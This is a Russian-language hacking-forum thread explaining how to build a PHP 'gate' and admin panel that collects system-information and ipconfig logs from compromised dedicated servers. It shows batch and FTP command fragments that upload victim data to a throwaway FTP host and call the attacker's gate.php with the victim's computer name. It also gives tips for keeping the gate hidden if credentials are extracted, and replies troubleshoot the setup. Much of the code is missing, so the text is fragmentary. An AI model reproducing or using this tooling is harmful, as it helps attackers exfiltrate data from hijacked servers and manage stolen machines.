![]() |
[EasyHack] Dedicated Servers - ГЕЙТ
Это продолжение статьи [EasyHack] Dedicated Servers
Сегодня я расскажу как написать простой гейт для логов с дедушки, для чего он нужен и как его использовать. Задача: накодить гейт на PHP, который бы ловил логи после запуска вышеуказонного батника, парсил бы их итд итп. Решение: Чтобы создать все это дело в одном батнике (да да, на деде будет для посылки логов на гейт запущен только батничек) я долго думал, как это реализовать. В конце концов я пришел к выводу, что надо просто заливать на фтп логи (а это логи системной информации и ipconfig - читай описание батника выше) и потом вызывать PHP скрипт который бы данные логи принял, сохранил и сделал все что нашей душе угодно. От теории к делу. Вот что нам потребуется: 1) фтп номер 1 - для слива свежих логов с какого-нибудь деда 2) фтп номер 2 - там будет стоять гейт, который с помощью пхп скрипта берет содержимое логов (по http) и добавляет к себе в базу. Обьясню зачем нам нужно 2 фтп, а не один для гейта. Дело в том, что батник, хоть он и упакован каким нибудь УПХ с паролем итд итп - все равно не спасет от того чтобы из данного батника выдернуть логин и пасс к фтп. Из этого следует простой вывод - если спалить логин и пасс от фтп, где стоит гейт, то можно этот гейт потерять, соответственно и потерять базу дедов, если есть таковая. Поэтому мы просто регаем фришный хостинг с фтп, и заливаем логи именно туда. Давайте реализуем сперва эту часть, а потом приступим к другой. Допустим мы зарегали хостинг Код:
ftp://abcd:qwer@servachok.comКод:
o servachok.comКод:
@ftp -s:"%CD%/ftpserv.cmd"Вроде с заливкой логов на фтп проблем нет. Приступаем к следующей части. Теперь нам надо: 1) добавить вызов гейта в наш батничек 2) написать сам гейт + админочку Зачем нам вызывать гейт из батника? Затем что после заливки логов на принимающий фтп нам нужно об этом нашему гейту сказать - мол, давай, лови логи, гейт ты наш дорогой. Это очень просто: просто добавляем в конец батника данный код: Код:
@start iexplore.exe "http://servak-pod-adminku.com/gate.php?name=%COMPUTERNAME%"PHP код:
Код:
php_flag allow_url_fopen onПереходим к админке: PHP код:
http://servak-pod-adminku.com/adm.php?pass=12345 В ней у нас будут рассортированы дедики... Любые добавления / пожелания / моддинг данного гейта,админки - приветствуется. |
лол, сейчас смотрел статью и увидел, что забыл в прошлый раз запостить код админки! ну я даю.. ) вобщем теперь там и админка.
|
Поскуднел ачат, поскуднел :)
Палевно слишком эта суета вся. |
админка пофиксена, корректно выводит инфу
|
почему то у меня логи на фтп не приходят, создал два файл
info.bat Цитата:
ftpserv.cmd Цитата:
|
dobav k info.cmd
Цитата:
|
я имею в виду логи на первый ftp (фтп номер 1 - для слива свежих логов с какого-нибудь деда) не приходят!
|
Цитата:
правильный ли адрес фтп-сервера, правильный ли логин/пасс от фтп,существуют ли файлы сис-инфы и айпиконфига, есть ли на фтп папка "logs", стоят ли на папке logs chnod 777 chmod реализуется на пхп таким скриптом: Цитата:
|
всё так запутанно /:
|
1. загрузка файлов на фтр не пашет. пишет не верные команды
2. загрузил файлы на фтп в ручную . сделал запрос на гейт . захожу в админку просто белый екран |
| Время: 06:54 |